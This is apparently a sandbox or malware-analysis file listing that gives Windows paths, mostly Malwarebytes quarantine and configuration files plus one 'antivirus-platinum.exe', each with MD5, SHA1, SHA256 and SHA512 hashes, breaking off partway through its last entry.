C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da465ea2-ea35-11ee-8e54-62d9003ae027.data
| MD5 | aa5f551cbe7348d71e8822dc6babe7f3 |
| SHA1 | 199b435c1fe9ef2ff93dd79046b1f036121481ae |
| SHA256 | 8b82e2f956f7923da81e9a755c4f39861e810976fa7a756a3b382dd55abbc99d |
| SHA512 | 86f39801be406ad5aca4eb79fb359621846bcae2137fc908613e2402ae0dbe274a6bcf03ded3a847b9a4fbaed44bffeac9d4980383f25520ebf7d99cdb7389dd |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da4748bc-ea35-11ee-8b08-62d9003ae027.data
| MD5 | 056af17bf40d6197663d63407467cba8 |
| SHA1 | 116a9b0ef9f60d953020fbc71c8c6eb3f74b009a |
| SHA256 | 4f6d73eec448acf83e5c66d8d97f4e82795a413573dcfc2b1f04ef8e230daada |
| SHA512 | 2fddae87f9c65ad9a1c8145afa0c812253d041af3b1df5e23835b0eac0b46d733700add830f16ab04aa7a6dc3729b0d146a76c0fe3e52d3a684402ba2c6c0449 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da59228a-ea35-11ee-b7ff-62d9003ae027.data
| MD5 | ccff793dc7d77c853e3a86629b584440 |
| SHA1 | a094f56f1150267c8c5783bcf2349961319af658 |
| SHA256 | 49fc9b19c2ed45705e8c515db7c60f93f619facdac90963ecec457505f4f116c |
| SHA512 | 337925b879db8879062c4fd036ed9541f56051793409e27c52be57f11b9093b55e2ae6c014f4ad885b711a848af7f312cd352d4207b09bcd0cceb6cde9252299 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da5e2c26-ea35-11ee-9044-62d9003ae027.data
| MD5 | 32133547c21aa4f3d0e4b7dbc30240e6 |
| SHA1 | c14988317fdd8fd478e822be56d5645b0580583d |
| SHA256 | bbf3ad61b934f6d81f86c426d2dadc3f93aa897518ef91da97947e48f1f8d7bd |
| SHA512 | 59b8b2bebc084ecddb69bea8bf51290fd2ba61063fdfb2212745f8b465355aabdae4c7819e15a854b9df126b0b216df46b42a8565b6b23c00b53aedb23585704 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da5e7ae6-ea35-11ee-b29d-62d9003ae027.data
| MD5 | 0aaf0741a02c713a1a9c8534d2ed70ee |
| SHA1 | d0d5eec055dee628ab505414e8e7685b9a24bf1d |
| SHA256 | 98ff0a87810a35569523ee40b1556eed1e03cf7ab223f07e20ba479a7bea24a1 |
| SHA512 | d1ea928e4e01deaf32a9e5f16ff64bb063b615c7748b0568a57fe7f22fd27958cf982638a105e56a797ac1b0e612193c176a56c9cccaf617fb4e94801d7e1197 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da62bfc0-ea35-11ee-89db-62d9003ae027.data
| MD5 | 89a2bdec74535f094c1917c27125521b |
| SHA1 | 337bd518c7786c48ecddc7d83bae01f0f9218c87 |
| SHA256 | 0cf2797c35ab1b136e378f512d1166c647bc4d437b4359c816a5d2cc02a300af |
| SHA512 | d99b99290fa5f9d592921c097ec0667091edd776a2ceceefa9ef09794be9dc8a807bf4583bb0d08e7437b07057f3f7c61c8f5d47730c0fcd546beacffd3f8479 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da63352c-ea35-11ee-84b6-62d9003ae027.data
| MD5 | 2de03336c6a5b02786c43a53884f87d5 |
| SHA1 | 20dde969e9e0321be84f8c63f55fca48b68b2010 |
| SHA256 | 64364ffbf0b43fc5a4dd36986dde77343e674a5ca9ebcb3541745532333d275c |
| SHA512 | bebbb1abd5a95ef6c7f48d04883562d346c40a438664d676abd0dd30b8a4d7cf42d0e60eb17d318a0fdd9e6008b863e9979a0e5b0304fb973be136c4061d2d21 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da63aa02-ea35-11ee-a352-62d9003ae027.data
| MD5 | 44bd28df70de38c8169d8cd383602c1b |
| SHA1 | 226f5217ddc2699a41ae6e7b8f30e5ddce2771aa |
| SHA256 | f2e436c17b1cb4111b807f91975c5155e787587c86dfdb2fb5a617c15197ca56 |
| SHA512 | 89028db8c3fb7e62318374203bc32eec534f7cb5901a530f01e892d28c239b4fb92d4a088efe4dc93b06d7184f23969f3cabfb5f1352863554772d3563efe5b0 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da64946c-ea35-11ee-8743-62d9003ae027.data
| MD5 | ccf415f8e387909f6520d954234fbe22 |
| SHA1 | 4a98d9fe55cd5b8a9bbfcdf5a7fa745c4bbf323b |
| SHA256 | 1d49c5bac7a97dc3f400a06c0fe7817212d62759a46e6b7316b670613f077652 |
| SHA512 | dd03623fd0d9652836837189d83772478e0c7504da06bfcb0f2ec2f066a21929be5319c83255ace6faa0097d780b96de850e4707865914721c3c23c0eba64295 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da64e26e-ea35-11ee-9a01-62d9003ae027.data
| MD5 | 41b02c534fa6a4063a326e719c0f7186 |
| SHA1 | 5ad54bb5d103d00ff2331fad51a0d328f659f2c4 |
| SHA256 | 58455f1e6deb04a9752a08e2ed5d86287e81496d54adc7bb723a86e7ca9e31c9 |
| SHA512 | 26e2e0e6cfefb7821a81ab7cdcb33fecdb9fd1e6b286f963b53b600ead4b3e4b7895250878acb04cf37e57488f5fdc6aea42328db781f8ec23bb29be1bf94638 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da6530ac-ea35-11ee-b1a9-62d9003ae027.data
| MD5 | e45aa5fafd95700b7ffd25841e580b9e |
| SHA1 | 6700f7e976c0157e1998bd4858bc2ccd813a89d2 |
| SHA256 | 4356d10b13a68465045e7a008039337be80ba22821b142bddae53d17d7c2657e |
| SHA512 | 0f1fff94f066ae19a82d748f4a0511872b67dd6a59271ec5fc928fc13b2181a0c8e19f31935bca3cd9ec42e4420689e9e771df9a678f892425dc088dd4ccd722 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da6f4aa6-ea35-11ee-ba6d-62d9003ae027.data
| MD5 | 5b4bb1b36b7978f97d254d2960289b7e |
| SHA1 | f245e740e3b97bbbd4303db9515682d25e7545c7 |
| SHA256 | 5d927042812ad156d77cb9e7bb7dca253de18e0c64abc90887cf50728f7b4fa1 |
| SHA512 | ded7cbe9fb1fd0120e00aeb846829a18b06a0e174ccbb4850d766aeb470f18492ff35e3aa8fbe83ff02a225d6667f7b0d86b37717da6b7e6a40e29af0316371c |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\da93ecbc-ea35-11ee-9353-62d9003ae027.data
| MD5 | ee882a4e9e3cabf2072ffa8b585fbcd2 |
| SHA1 | 6ac076607378805d9d6fbb292f1a59f0471b4f4d |
| SHA256 | 353f64e4289fe3269fbe5275c73518eeb3009b331afb686eedace414187cb8dc |
| SHA512 | 8bb266722ef5940cb47d50b30ef3a0fd13ba4523c604aedfc5a925d052051630187f4bd0e896c557c9536960b4b26f5251f141cae7d0faf9c492510407bea9c2 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dabc5148-ea35-11ee-ba19-62d9003ae027.data
| MD5 | dad99738d43475d21d1a07104a1d2dbf |
| SHA1 | bd04a988e199778bc4b79beff3275e7cdcc8b80d |
| SHA256 | 010afa006ed5c07616c24f40b3e960c70631212ad1cefd8f7159d6acd2f325cc |
| SHA512 | 6dbdfb8910fd694ff610d5d358efd21652cd720dce890296fe24d7e2878f32f0ecee6adda27f303731a3c05f61db08c1b41f0ff57caa524e0194c7df67892203 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dabfac9e-ea35-11ee-860d-62d9003ae027.data
| MD5 | a313fa9ac33766c795e0297bc7739fc4 |
| SHA1 | c5d1388262409ac5aedcf6b87324b27ba16b0994 |
| SHA256 | 5521611b459a3a8e3191790ab8649c28ddc372262b5dfa49360d6c4a6bb04a72 |
| SHA512 | e0b91fb034399822c43f90d46856bed50bb7e1a8048a262b33143a1d71e533cacddb39b0c17003b353442cdd2991f75ec4bc360db7dfc292922a6612f745b09a |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dac307fe-ea35-11ee-9fec-62d9003ae027.data
| MD5 | 6e922cc985e06cfb47f4216f732d6b6a |
| SHA1 | 6b2ca5d31b45eb3373a5c159254523570e18a402 |
| SHA256 | f936198a3c4e19ab1b7ff7522455e2468455c73b605c3f8243dc5a8e41d95e60 |
| SHA512 | 2186e2a99edb1d2795eeb84c2dd858e04eb77ed35cc1ceeffbdae73a60e1e597109307dc2121a2dc0db4bd03052ae097f9bba38472c8eb984a50124789d27bd2 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dac307ff-ea35-11ee-938f-62d9003ae027.data
| MD5 | 906c4711b03e79717cad34e62a49a714 |
| SHA1 | a89c17fdd43ff8bf445dda222ce622225e5fe47a |
| SHA256 | 54fd761ee092f89e0f28a85be59b7b6bd0733d931da75134529382c815495b7c |
| SHA512 | 5bde917e335cbeadcf4c81ee883e2a494be9c4db5ea0e53512c1f35464dda31eb0622fea37a02a121b59ad11b664e254f53172551502dfe45a779072f53bb710 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\daf64d3a-ea35-11ee-b74b-62d9003ae027.data
| MD5 | caf45e8a907ffcac307ded0e42437523 |
| SHA1 | 54b096fd54c7088fccecd1576d8ac33b10b306a1 |
| SHA256 | c58d3afda21a6b306ae7db3dde631eb6ddf95aa036f135eca5debb3abf67ef60 |
| SHA512 | 3de9f615ab5503fc37c791b24de1b8a4e1baa5ad1779598b24b3727d9390960d3afb96484a037d39511feee8eff60d6ee202343052ff99cb2f9998f5830ae79c |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\db176934-ea35-11ee-975c-62d9003ae027.data
| MD5 | 73677b886169d91d62c37efa854348bd |
| SHA1 | 12671141333ba83572d501722916cf8930d14e18 |
| SHA256 | b454fc9c040b1b8432fc04c0ffd6f017a03caf9071fd7359694c76f252758758 |
| SHA512 | f10c93198576bb9053c49dcbbb4384736c58f513cb084241463159c18696d8d6b9a6cadd51d39e1adeb14f4df8c608321b4b2079632f0641de4db5e967712f0b |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dc603d48-ea35-11ee-aab8-62d9003ae027.data
| MD5 | d69f471fae0407cdb21bea59849d8484 |
| SHA1 | 693d9579a33dae21bd43e85e413a1107e38a5ae9 |
| SHA256 | a94bb4306c39da397c00b725096c95cf51ef872ca0525c2f1a37df573f00b5ee |
| SHA512 | 21cd31b87a4550c48842b8701668dd92e9f400f37849e00d6ecc7bb77a37eed20ada469fb1448bf1e7a0f2ad590eb564f2067d981a68f4702bc8b968af5e8e51 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dcec9eaa-ea35-11ee-a09a-62d9003ae027.data
| MD5 | e39e58582dd5c1414ba50c3c875779a1 |
| SHA1 | 364f143c8b17ab7a9a398bcb42c457f5a08fa772 |
| SHA256 | 80b26b20470c305c65951b018eb4d25c894ed00caa80203a9a547283f3b217cb |
| SHA512 | 3e4e6b2abe8fde4abd5deef1aad8a987d03cb5421de6e46a8e4b752b3c085848cf9a5033425b41b3fe5ba86ee11baa023b1a8a767ef79f6159da561670b6db10 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dde27046-ea35-11ee-a6ea-62d9003ae027.data
| MD5 | d79764c4d4ac00d00ffc6a98cbe6187a |
| SHA1 | a2f713a5fbbf5233a2f540622108a92d9e0057f2 |
| SHA256 | ef047ebdc6136a4c270c30d194a04afdb58becf8cfbef35bea2c99b62597553b |
| SHA512 | 4a72eb615e5c98a6485e52ef52afdbed1b2e74046ca452d03561bf1d09bd201d0ef1942ffb54ff4409822d143767a29969b212e3136d34309150b1cd9e38a6cf |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\de74c518-ea35-11ee-90bc-62d9003ae027.data
| MD5 | ccc02e72247f49e9be3799fdad7e6f9b |
| SHA1 | 474e0b164fd65e8637a78e1bc8fe049ba0295fcb |
| SHA256 | f09eca7fc25517cf9222d46ee1c240ebab5e3f29f6228aef78b62ee5389289cd |
| SHA512 | 6271816ef2d36f4cdf5e58790019248eb2d449bbd8c70d72e7277d38f0ec0dd183cdfc6b94dcb8fa4f33768d7812588b94716782c30620b41effc86875656927 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\de7737e4-ea35-11ee-b79c-62d9003ae027.data
| MD5 | d9e89fef5e55eea97408f97752dcf938 |
| SHA1 | a3cec957bc7838329ca87eae621d0ea5209a7cb5 |
| SHA256 | a163ca3049a6fa9a1b92c8434388527fd37c86fde2444ac23bf1ca49a84f59b5 |
| SHA512 | 29ef57a2b2a8e36c586b680f11b5bda57cdd5b6e680239e7c89717a36943986ec64fdecddb24033b9c2ad73c85b4fae31fbf5b69dec86c1447285fa696e1021a |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dedab3be-ea35-11ee-b518-62d9003ae027.data
| MD5 | db8402e67da66dcd3a2bfd045a061d52 |
| SHA1 | 58d41bff3a513dfb1de5ca5f400303b57257b4af |
| SHA256 | bd65d54ecba1ed624e919623c2d65a17bbb6d274b68d898ad01f148cf93d975f |
| SHA512 | 96776a6f350994182bb7bb801868e7173a9df747e6deb9b533f0be161215115aeef2be437dc7ca1da1526cc673beaef54c4259bade1e2149e565a4e4be87bf81 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\df5ae05c-ea35-11ee-a172-62d9003ae027.data
| MD5 | 97ed0523e3c91992cce61eced24254f1 |
| SHA1 | edbe7ea1a025a756a5841002d1f6131140474e66 |
| SHA256 | d403f72d6ae90302f10086998f18183523e3fa3d31de696cb937f387a75ea9f9 |
| SHA512 | 87d4be343538bb872260e51bef6ae05720ff57553e5e41082e4c41c6072a61e70c99f15e66da46447557f316b81da7cb1e397126ef2805315e214bc6b03b8082 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\dfcf0702-ea35-11ee-842a-62d9003ae027.data
| MD5 | 6ce3d5f29bdca628e7e880db2c9e6bd4 |
| SHA1 | 65ea500f572feda4fc050648bbbf58ac18fd4115 |
| SHA256 | cec07981fb29b34436dd732d86cb45f5f1a93eef68e4bb39a3a983ea49b90898 |
| SHA512 | ddcda95a46630c3acef80fd0c3536401dac88f5cac6a564462c6d9752b6e29ee3c38d1fdfececfc62d331232079a01af9dea4fa56d7bc9e5eb289de7a04c7055 |
C:\ProgramData\Malwarebytes\MBAMService\config\UI_ApplicationSettings.json
| MD5 | 330dce881a9f6b18619c4dafdff3b50b |
| SHA1 | 30b47bb0def7dee96b97f052a077f88091e7fefd |
| SHA256 | eabb46a28ab331d49059fa68a7ca9dafa3455bfbeae217db8eedefae1e8ec3b0 |
| SHA512 | 415fa2036eb63e8e1e506b8d9949ca80fa1891252817c79060d0cd2bfebc6a73b79e10e0d1c4da500932454e9f0eb9cbe5098017a71d8fd066771c74c3b8a1f3 |
C:\ProgramData\Malwarebytes\MBAMService\config\UI_SecurityAdvisorSettings.json
| MD5 | eccc5d868618dd0bdc6f7e1f2154fb03 |
| SHA1 | 40404e686399cca2632a6990c3e5005980bdffa1 |
| SHA256 | ed11c69010982572072f5d37d9eb6d7ebc814b9999154f7005efef47b56a5089 |
| SHA512 | a3bd3d246fcb9449715ef24b6142035ca8b71bafb2e6e24fc3b3fbbb45325ac391159efbfbe1e5ac8e2c388812349a735d40fc8f893c26b95c5ef327df3bbdfa |
C:\ProgramData\Malwarebytes\MBAMService\config\UI_DCountInfo.json
| MD5 | 50305e183fb3b156682d4a4c01e1fd80 |
| SHA1 | 9ff2e7eafc667e98dc331f07a9fc81215d149072 |
| SHA256 | 42ea6695369aafc8497e55c4dc2629be35d20da2cb3c397aa76ccd5aebce6a5a |
| SHA512 | 0ba73a9accf0282f8573ca6d8ea33f14caef3e3ac27886ff7871cd6d70dcb635a0f3f55cbb5ebe409e9dfa6a58062d4f1980315b95d1ffe584eb1a0a53ef4532 |
C:\ProgramData\Malwarebytes\MBAMService\config\UI_NotificationsSettings.json
| MD5 | a09d48816f716e829b996aa3923f3c4a |
| SHA1 | 475936242c11115607919072fd35b352ab6b59bd |
| SHA256 | b4a970db14441050499290fc276d11c371c59526eb604384d0d17cdc8828ca74 |
| SHA512 | 52a28e597f0bb5880abf060102f4fefe180b521e32ccee141df522a1de946738d451f4f24def827f02775d7223845401abf9cba3171fd027e43cb037ddb2fc68 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
| MD5 | e3453a427627455dd9912352749c1e3d |
| SHA1 | c65ea23acefecd59ec67c4dd07bd776ddacb5985 |
| SHA256 | 1276a8c9a4cc327e2ca1261b5cc2360e3941eacb79b4fe0093d50298c43aeba4 |
| SHA512 | cbce41bc6e79ff5ce8ee9abf2efd021b146eddab449a2e6ce75c818b4737e943f874e82aba4eb14517feb354a265228612afb7a6c9571843421489eae9a41ccc |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\ProgramData\Malwarebytes\MBAMService\config\UI_IrisSettings.json
| MD5 | 254936d51f6b07f3af2a9d1be2e4ff28 |
| SHA1 | 7bdfed95a78bd27614d9dc49be91934bb210e26e |
| SHA256 | 57df1378d3981b649b373a585042be4b39c20216ca4ab7412c2360ee50b89409 |
| SHA512 | 4deac3dac0912691dffc293321deb4b6d063c83efb5947b4d81e4d558c62fb977e3fbe5b50f3a58fe3223b4511568d81cfe744610270d8d297b4249b1235fad3 |
C:\ProgramData\Malwarebytes\MBAMService\ScanResults\b8d8525c-ea35-11ee-b51c-62d9003ae027.json
| MD5 | 6e887d0aa80e02734b0f1fbb58223ffb |
| SHA1 | 24086fb1ea79fe7425f7c29864d0dc13fb3566fc |
| SHA256 | 5a4cf49b59cd322188cc85d97d08350028a6e13bd767c39203c1cd644c4974fd |
| SHA512 | 74cd632c538f6d183c7a85487346798d82fb12fc387555b59a022fd970acd5f4586c42f24f5c1525a7dd1def9a959f4c3ffba48290d90a7e5a1791363a191f85 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 04a6ad177856e58529e3cb3e0c0b9f3e |
| SHA1 | 90e4834c4b54f6287938ead77517157a878bee50 |
| SHA256 | 041eff2420987a6acba22f26eb277a3a1a3dc455f944750b86a3b5ba6f1feae3 |
| SHA512 | adf39ef0e5435878c4d12db5ca3a15c3fa920792fc8dcbc9bc99f032322bffec71ee05a536c709bfbc345badfa60652211af6c9bbdfe7cc74af85299613a3dcb |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\9e4a56a2-ea34-11ee-a052-62d9003ae027.quar
| MD5 | e14052f4153ee3f28f703c3d51f0f273 |
| SHA1 | 8eece57712a4482f92065ba2e2cdbd8b8f0018bc |
| SHA256 | 79dfbc7ccd4e1736571d3575a80cba5d28e0bbb0521106c1d936a76c142da45d |
| SHA512 | 8ac8b58ceec4f9485290920f25217d047be43957454863ccbf65f873b8e07c29d98dd2e7e6794f0349b351d73ac8fbeb6f25050d0400a32289a34ea176f6306b |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 7c190ff403772f5b531d3bc2f684e937 |
| SHA1 | 057fb55273f50b4c35514915b44156cc2ad09f92 |
| SHA256 | b8e1ebc291d4d5c649208e853384f782dec16abe23bba662ddc1a665c76c17ef |
| SHA512 | b06300d2520bdae3cc798da7e9c99d759e9c83d95d8dda4d02f89eab5f9c734b4dbab3743b968863aa9e3360e2962c83440ebb1c81f4479300fbb812dd6620bb |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | a772aabeb4abe46cd675944fae7f4bab |
| SHA1 | 13db034e95bb79d11a278a4e5af8fd12ad1f024c |
| SHA256 | a10848616b28755a8027cee3b77d66ab9f24a70a933372d67737e0cb700278b8 |
| SHA512 | 3a5737c74441e92496e0a6214cfa5fd90e21f0e5b466cfdd8193327ac2f5e1863a90a569f37860d553902145be2d5840778e9220f91112166ef3ebfba14571eb |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 2fe78eb7134a70b7f1a9e2a7a056b1b4 |
| SHA1 | f12debe73d1c48261c0dcea0f0276fe2b5e8a793 |
| SHA256 | 48cf8da1becadf77261b4e82a28119ba83b1788bb0e275527b04213472a8a768 |
| SHA512 | 2168089e6c3206ac7cc3520b972c0c004b499011c39a02a571165847d07ae52e49742fd079e085b2f77dac7706b35eb9e42555a2b8bb064f3147585687eca462 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | d4a1124ea249a1f922a437e8dff1344b |
| SHA1 | 8e67583550c0af20bc0813fa4b825935114fa6e2 |
| SHA256 | 03ca14b4470688330be5e9a9654262535f3b615679d8fee24b31ace0ff1fe793 |
| SHA512 | 9fc342ec1f4a54ad85ca0b77d014c22aa830d4608844c6cd3691738ff8730975ff442778ec4c78c088498ab4421af17dd8c464b1e48d93aea1e0eaf13b6f9cce |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\9f9f3856-ea34-11ee-a002-62d9003ae027.quar
| MD5 | 7b1a17bd3bdc727966d34f64463fe576 |
| SHA1 | d1551b92f87fdef307579c91f137124340e5ddbf |
| SHA256 | 54b12e1d8a6cef13681c98048ace19d78a1a7857cc4cb59c0bc3c7cdad69b77b |
| SHA512 | 3cb1dd7020c0662ff7f31094f2118c4acb2956d6acea9ec10e044d1ad7266388788d6ffd30094b554cc497f945a6be06220346b380c35ec8a9898de114cb903f |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 221d66c289481bd5e6d8751ea97c48d8 |
| SHA1 | ef3b66a9bea9ed47a2d5e5371a25920b9d406e4e |
| SHA256 | 7ac153f085a8ce4f7d96f527cf5cbfa9bdd95fc1e5f4e91591b21a36ee2751bb |
| SHA512 | 81abd1ffc8a74aef44f1b173c4031b5aa9650bb966953ce7a79523dcde7090991342d3aa26d45cd414d6a32ad8494d1ff615e86335c300ee66a159a47951a47a |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | f0c0526c1c0d3c63621f67730d2acd2a |
| SHA1 | c1a2c5dd6cc873ef427a5ea8df2f70b022a9bc6f |
| SHA256 | b64a671c7ae2fae6048001c5fd7ff1e498e9eb4dc376b47e92f79dfa3ec454e1 |
| SHA512 | f52b47365854c845af606262df02b88d900e0e9b389b74da8107fab4cd6dcd6d42d2990aec2a391dd76d3fd58de2763bb066c46e00667a120866bf0b134f6f50 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | ac8cf7137702c115c122f5d89e81177d |
| SHA1 | a2e1123ba7f648de92d4e46a8114ffff36e40081 |
| SHA256 | ce260d9571cbebf3da7928f30362bee4670c13118ed8029744f533dc927d2e3c |
| SHA512 | d459367810ab8399e63dbd57c14f950a32fb315e36938655ce7cf4b5ee90e65a8a27affcfd69fdb12f138278a30d229a13241ce58267544eed5e48dda21b6970 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 5c5b713422e3505abac890ea49ed7d7e |
| SHA1 | ae438246285d53f131354a89b159b9d532609975 |
| SHA256 | f270584891d3030c1cff86fbd9cbf9f8c49ecd10d331ceea5b623427e131b6dc |
| SHA512 | 2d5c898249b599b36247d74004224799d4bf444af8e192b743f397ed83adcdfc4ccd7ec280bd86583a6b8ee6bdb06699e3add27777d1621f5fc2b164ad923676 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 89ba43251217f12bd468aebc4984d773 |
| SHA1 | 05ee3a403fd0a141898cbc95da1bf7b43175ce8f |
| SHA256 | 3d483a7089eaa46059f6e568eb2f8b3fba90e235f6585245809bd792aefd3ce6 |
| SHA512 | 85d5b3abc2b9f6eec5ca079f1fd13095ec5b98e4dc3187cc6c8e699dd9c80500b2c62147e16703e29fa261f7131f5a37c6062de33e381599f27b3865ee8bab8d |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | d0e55e4dcfa48e8159a561da0daf163e |
| SHA1 | 2f470647b527c553cdaaddbb9593e5f7348f2524 |
| SHA256 | 29c720906715bf07a0d63e2030c6fb654206cdf8df230548bf5ae87f618a3001 |
| SHA512 | 783d673b3d84cf2909ca85f95b6c0a94f344067bbf410788070751642863872595b411f3a867a33c6e729ec436524d6256a0523ded18416846be2de35107af0f |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\aba2ef76-ea34-11ee-8cbd-62d9003ae027.quar
| MD5 | 59af7a1cc7543e0f26a0ed6ffae67f1b |
| SHA1 | 31d81636c62225a44e105eda3bc95cf20c64e17e |
| SHA256 | d2edc96f39128fd278df7de0240d07eccfca00fb0d9e6d84331f22fa96c63026 |
| SHA512 | c65338a3da3b08631559e20db6ecafa947ed6696e6209f50b95d353a5361d031b37278818b42b8efe17ed39cbf218101f81df0ca173d0797c67828bb985ec5af |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | cb0f5dffd60b60477ea7d5089f7eef81 |
| SHA1 | f23c058b5ce501a52b462756f3b9ec448d0b4fc6 |
| SHA256 | 9b295c000ffcf67875c9c8141194b3725c00301b0ad04344e0789c6f817d8bd0 |
| SHA512 | 78ae95af42faff02d55c20e6b96acb2099f8801864ec2ca1015ecf85f378605e8f409b37add7b9d2c74fb7bea2d8330f0dcb99e3da0aaa3fa3cb1ef7242ea465 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 8d7f65f91f36978063caf504e025e233 |
| SHA1 | 901b4e2dbf27de2f5f5b09d2915ed5aa4aaf8f76 |
| SHA256 | 2094f84cafc38fd1ded828efac6cf894facce0c142d6b448c32d7dbe9e06ab59 |
| SHA512 | a671c36adab2af1a19e6b98ab76636f9575e1c4c6311ca3d78521a0f6e07643767560233ab20c5e5adac046d7f81397281decc26f9dbbecabea112952d9284c9 |
C:\Windows\antivirus-platinum.exe
| MD5 | cd1800322ccfc425014a8394b01a4b3d |
| SHA1 | 171073975effde1c712dfd86309457fd457aed33 |
| SHA256 | 8115de4ad0b7e589852f521eb4260c127f8afeaa3b0021bfc98e4928a4929ac0 |
| SHA512 | 92c22c025fd3a61979fa718bf2e89a86e51bf7e69c421a9534fbf9c2d5b23b7a9224d0e9f3e0501992038837015214d1ef73b532a68b7d19de559c9ab9c6e5f6 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 66cea6b34acd1ddee5d37cfbcd458088 |
| SHA1 | 4744625b612d8d72383feee686ffc8c9198a3a56 |
| SHA256 | bd58ea3a499a48f6298156c3c2fa290e87a5d4dfcbe8239dc4b5d74ddfa01522 |
| SHA512 | f3feb66ad87471b7aef7ca8292476c4727f56bf6fde247f8a08e26eae3a3d38df91b6843ebafe00c458a71d2adad9362d041a78abb634f4587e0b0f8e5675a31 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | f5c7106c680af615a89e7a4896172715 |
| SHA1 | b595fe93aa0e4b22e5ccc70e583142313c244fb0 |
| SHA256 | f730da03de15e9be03a3a7576837712ac1e45f33eebfc4cf0d3dee558eb50e28 |
| SHA512 | 06b24f7d314685c0db00a500c6fd965b9938b0ff4c6dce80fff835c6aa032d6c2cd31e579cb3e114eafc1201fceaceedbeead30f54f27328a645041270597e20 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 5c17976c7820655e52e6d20862b417de |
| SHA1 | 7ccd6bb7c644c20cf1eac478bb7cefae5c9c0e5c |
| SHA256 | 2dd7da932c3d05ce2a052ce62d8e760cb1bc01b1f2556c8735e6a697df2265b7 |
| SHA512 | eba2b28a93a368bd1a9164cfbeaf654fd1803eac09427f298a7d97d6c8e6af4d5c22464a6370d5bbfb2714ed0fa34d2bdd235042de3ab91f0a058fcdb4296303 |
C:\ProgramData\Malwarebytes\MBAMService\Quarantine\d9f0008e-ea35-11ee-81f6-62d9003ae027.quar
| MD5 | 2d37054b8929c37a0c985c8dffbdcce8 |
| SHA1 | 3a272f05d36ec749aa9b25e23c43c2efbee995ca |
| SHA256 | ce7dad6645f2c3c25df0da6d12557f2c507e2d1f773ee0fd67d65ac990015137 |
| SHA512 | dad371acbc9f2c3eded1bce51bb763a956e90d12afc1e73e0f0db7716b2cc64a9f238cf6ab60ad943190743f4801e3acdf1057891be9e46a69bac7e164390518 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 0994a62592ae777a5ff09ccd1478c723 |
| SHA1 | 53d5ccdd9f3645f85ccd1a6da9dc26fc89ba9557 |
| SHA256 | ea75756635e6444649e1a1e4df25d6c9ee5a01671aa76c5ee5f6745cacb10d6e |
| SHA512 | 4c495a9f85b622a0db4ee9253371c384df65f7b9ddbc88093ecb9078047225f7490ffb12beca9d69310008c2dab8f96a17e063ef9c1a64a2ae7a27a7d83e1af3 |
C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json
| MD5 | 89456884c1340c9f194075070cdd35e5 |
| SHA1 | 22ce9bbf9dc4fdb4421554d733f6ac4e74aa7f6d |
| SHA256 | ff9b4aa56bb666d68dae6fb6a05e2fe87bcfb99e0e4d63bde8b9ca7ada784032 |
